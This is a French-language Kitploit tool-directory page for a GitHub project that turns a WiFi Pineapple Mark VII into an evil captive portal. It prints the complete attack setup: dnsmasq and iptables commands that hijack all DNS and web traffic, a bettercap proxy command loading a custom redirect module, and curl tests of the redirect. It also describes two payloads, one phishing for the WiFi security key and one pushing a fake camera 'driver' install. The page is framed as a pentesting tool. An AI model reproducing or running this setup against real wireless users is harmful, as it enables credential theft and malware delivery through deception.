Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WiFi-Pineapple-MK7_Evil-Portal — Boîte à outils pour point d'accès malveillant destiné aux tests de pénétration WiFi, déploiement de charges utiles de phishing par portail malveillant pour capturer des identifiants et mener des attaques d'ingénierie sociale sur les réseaux sans fil. | Kitploit
Outils/GitHubGitHub/tw-d/wifi-pineapple-mk7_evil-portal
Audit Wi-FiHameçonnageSécurité Sans FilTests d'IntrusionIngénierie SocialeRed Teaming
GitHubtw-d/wifi-pineapple-mk7_evil-portal

WiFi-Pineapple-MK7_Evil-Portal

Boîte à outils pour point d'accès malveillant destiné aux tests de pénétration WiFi, déploiement de charges utiles de phishing par portail malveillant pour capturer des identifiants et mener des attaques d'ingénierie sociale sur les réseaux sans fil.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
11il y a 2 ansPas encore vérifié

ANANAS WIFI MARK VII - PORTAIL MALVEILLANT

  • Le principal point d'accès rogue et boîte à outils de pentest WiFi pour opérations d'accès rapproché.
  • Les attaques passives et actives analysent les appareils vulnérables et mal configurés.
  • https://hak5.org/collections/sale/products/wifi-pineapple

Auteur:: TW-D

Version:: 1.0.0

Droits d'auteur:: Copyright (c) 2024 TW-D

Licence:: Distribué sous les mêmes termes que Ruby

Nécessite:: PHP >= 8.1, Ruby >= 2.7.0p0 et WiFi Pineapple Mark VII 2.1.3-stable

Installation (Distributions Linux basées sur Debian)::

  • sudo apt-get install php8.1-cli php8.1-curl

  • sudo apt-get install build-essential ruby ruby-dev libpcap-dev

  • sudo gem install sorted_set bettercap

Description

Un portail malveillant est une technique utilisée pour tromper les utilisateurs d'un réseau Wi-Fi en les redirigeant vers une page web malveillante au lieu de la page d'authentification ou d'accueil attendue.

Remarque : "Issues" et "Pull Requests" sont les bienvenus.

Testé sur

Système d'exploitation avec/sans navigateur webType de notification
Ubuntu 22.04Aucun
Android 8.0.0Système
Microsoft Windows 10Aucun
Raspberry Pi bookwormAucun
Ubuntu 22.04 avec Mozilla FirefoxAlerte
Microsoft Windows 10 avec Mozilla FirefoxAlerte
Raspberry Pi bookworm avec Mozilla FirefoxAlerte

Configuration

Hacker - Connexion à l'Ananas WiFi

Connectez l'Ananas WiFi à votre ordinateur via le câble USB-C.

Ananas WiFi - Interface Web

Paramètres > Réseau > Mode Client Sans Fil : L'interface wlan2 doit être déconnectée.

Hacker - Terminal 1

root@kitploit:~
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
        inet 172.16.42.100  netmask 255.255.255.0  broadcast 172.16.42.255
[...]

(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE  SERVICE
53/tcp   open   domain
5353/tcp closed mdns
53/udp   open   domain
5353/udp closed zeroconf
[...]

hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit

(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE SERVICE
53/tcp   open  domain
5353/tcp open  mdns
53/udp   open  domain
5353/udp open  zeroconf
[...]

(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000

Hacker - Terminal 2

root@kitploit:~
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/

Hacker - Terminal 3 (Optionnel)

root@kitploit:~
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate

hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

hacker@hacker-computer:~$ exit

Utilisation et Chargement des Charges Utiles

Dans le répertoire "./payloads/", vous trouverez :

DÉVELOPPEMENTAuteurDescriptionComment utiliser
skeleton.htmlTW-DCharge utile vide destinée au développement.Documentation
EXÉCUTIONAuteurDescriptionComment utiliser
web-camera.htmlTW-DSimule une fausse vidéo de surveillance et demande l'installation d'un pilote pour son fonctionnement.Documentation

web-camera

PHISHINGAuteurDescriptionComment utiliser
wifi_security-key.htmlTW-DSimule une fausse mise à jour de l'équipement Internet et demande la clé de sécurité WiFi pour continuer.Documentation

wifi_security-key

Télécharger l’outil